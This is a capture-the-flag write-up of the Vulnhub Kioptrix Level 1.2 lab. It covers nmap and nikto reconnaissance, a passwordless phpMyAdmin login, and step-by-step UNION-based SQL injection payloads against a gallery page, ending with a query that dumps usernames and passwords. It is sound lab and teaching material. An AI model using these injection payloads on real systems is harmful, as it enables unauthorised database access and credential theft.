Kioptrix: Level 1.2 (#3) – Vulnhub Writeup

Source: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

The next one up in the Kioptrix series! According to the Kioptrix 1.2 blog entry we will just need to make a quick modification to our hosts file to get the webapp working. As far as getting this up in VirtualBox I didn’t have to do anything special except add the VMDK as a IDE hard drive.

Let’s go ahead and start with an nmap host discovery scan and then we can map the IP to “kioptrix3.com” as instructed in the post.

nmap 192.168.111.0/24 -sP

DHCP assigned 192.168.111.1100 so let’s add the following entry to /etc/hosts:

192.168.111.100 kioptrix3.com

Now an nmap scan for OS detection and service enumeration.

nmap kioptrix3.com -O -sV

A lot more trimmed down than the previous Kioptrix…there is just an SSH and Apache service immediately visible to the outside. Telnet/nc banner grab of the SSH service return the same information that nmap does above. Let’s navigate to the Apache server in a browser and take a look.

Home Page

Blog

Gallery

And a login page.

So a number of things here. I poke around the photo/blog entries to check if comments are available and they seem to be turned off. Near the bottom of the gallery page there is this tidbit (suggesting there may only be 1 CMS user setup?).

There is of course also an admin page. A new lead programmer called “loneferret”. Looking through the pages and source code I didn’t see any details on what version of LotusCMS they are using.

I try some SQLi injection attack tests on the login page and none are successful. All that is returned is “Incorrect username or password.”
I try several combinations of admin/admin, loneferret, administrator, ligoat, goat, etc. but I still get the same message. Assuming the same login failure message comes up regardless of input we won’t have an easy way of confirming a valid login ID.

A nikto scan gives us some good new information, though.

There’s another login page at /phpMyAdmin/ to try.

Again I spam a few different user/pw combinations and get no leaked feedback on whether or not I’m using a valid username. But I do get this weird message back:

Sooooo…what if I don’t enter anything in the password field?

Well, it means to get in without a password and at least have view access to information_schema. I looked through these a bit but didn’t end up seeing anything that could be useful. I ended up poking around a lot of the pages on the site to see if any were susceptible to SQL injection via URL.

For the following page:

kioptrix3.com/gallery/gallery.php?id=1&sort=views#photos

I tried a few simple SQLi tests and this one was successful:

http://kioptrix3.com/gallery/gallery.php?id=2 OR 1=1

Compare to normal boolean response for false:

http://kioptrix3.com/gallery/gallery.php?id=2

Or if you just enter a ‘ you get a syntax error back:

Alright, let’s play count the database columns:

http://kioptrix3.com/gallery/gallery.php?id=1 order by 6 —

1….2…3…4….5….6….7…NO – OK, we’ve got 6

Test real quick with 6 null values to make sure:

http://kioptrix3.com/gallery/gallery.php?id=1 UNION ALL SELECT null,null,null,null,null,null —

Then I plugged in 1 and “system_user()” to display the current user.

“@@VERSION” gives us 5.0.51a-3ubuntu5.4.

Current database is: “gallery”

Now let’s dump tables:

http://kioptrix3.com/gallery/gallery.php?id=1 UNION ALL SELECT 1,table_name,null,null,null,null FROM information_schema.tables —

I tried playing around with where values were displayed but this ended up being more or less the best view. Tables “dev_accounts”, “gallarific_users”, “user” all looked interesting from here.

Now I tried displaying the column list for “dev_accounts”.

http://kioptrix3.com/gallery/gallery.php?id=1 UNION ALL SELECT 1,null,column_name,null,null,null FROM information_schema.columns WHERE table_name=’dev_accounts’ —

This looks good. Spit out the IDs and passwords!

http://kioptrix3.com/gallery/gallery.php?id=1 UNION ALL SELECT 1,null,concat%28id,0x3a,username,0x3a,password%29,null,null,null FROM dev_accounts —

I used the concatenate function with 0x3a (the ‘:’) to separate values so I could dump all 3 in one output.